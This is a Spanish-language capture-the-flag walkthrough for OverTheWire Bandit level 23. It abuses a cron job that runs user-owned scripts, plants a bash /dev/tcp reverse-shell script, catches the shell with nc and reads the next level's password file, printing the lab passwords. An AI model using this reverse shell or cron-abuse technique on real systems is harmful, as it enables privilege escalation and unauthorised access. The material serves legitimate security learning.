Nivel 23

Descripción del Reto 💻

En este nivel, aprenderás a conectarte a un servidor remoto usando SSH. El objetivo es familiarizarte con el comando básico de conexión y explorar el entorno.

Información de Login 🔑

• Username: bandit23
• Password: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
• Host: bandit.labs.overthewire.org
• Port: 2220

Pasos para Resolver el Nivel 🛠️

1. Conéctate al servidor usando SSH:

   bash

   
   $ ssh bandit23@bandit.labs.overthewire.org -p 2220
   This is a OverTheWire game server. More information on http://www.overthewire.org/wargamesbandit0@bandit.labs.overthewire.org's password:
   0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
                       

   Copiar ✅

2. Analizamos el cronjob para bandit24

   bash

   
   bandit23@bandit:~$ cd /etc/cron.d
   bandit23@bandit:/etc/cron.d$ ls
   cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  e2scrub_all  otw-tmp-dir  sysstat
   bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
   @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
   * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
   bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
   #!/bin/bash
   
   myname=$(whoami)
   
   cd /var/spool/$myname/foo
   echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
   for i in * .*;
   do
       if [ "$i" != "." -a "$i" != ".." ];
       then
           echo "Handling $i"
           owner="$(stat --format "%U" ./$i)"
           if [ "${owner}" = "bandit23" ]; then
               timeout -s 9 60 ./$i
           fi
           rm -f ./$i
       fi
   done
   bandit23@bandit:/etc/cron.d$mktemp -d
   /tmp/tmp.aA6EVNBWTr
   bandit23@bandit:/etc/cron.d$ cd /tmp/tmp.aA6EVNBWTr
   bandit23@bandit:/tmp/tmp.aA6EVNBWTr$ nano shell.sh
                       

   Copiar ✅

3. Creamos un script

   bash

   
   GNU nano 7.2                             shell.sh *                                     
   #!/bin/bash
   
   bash -i >& /dev/tcp/localhost/1234 0>&1
                       

   Copiar ✅

4. Nos entablamos reverse-shell con el script

   bash

   
   bandit23@bandit:/tmp/tmp.aA6EVNBWTr$ chmod +x shell.sh
   bandit23@bandit:/tmp/tmp.aA6EVNBWTr$ mv shell.sh /var/spool/
   bandit24/ cron/     mail/     rsyslog/  
   bandit23@bandit:/tmp/tmp.aA6EVNBWTr$ mv shell.sh /var/spool/bandit24/foo/
   bandit23@bandit:/tmp/tmp.aA6EVNBWTr$ nc -nlvp 1234
   Listening on 0.0.0.0 1234
   Connection received on 127.0.0.1 41962
   bash: cannot set terminal process group (3846742): Inappropriate ioctl for device
   bash: no job control in this shell
   /usr/bin/lesspipe: 1: Cannot fork
   bandit24@bandit:/var/spool/bandit24/foo$ whoami
   bandit24
   bandit24@bandit:/var/spool/bandit24/foo$ cat /etc/bandit_pass/bandit24
   cat /etc/bandit_pass/bandit24
   gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
   bandit24@bandit:/var/spool/bandit24/foo$
                       

   Copiar ✅

Resultado Esperado 🎉

Sigue así y llegarás al final del juego. ¡Ánimo! 🚀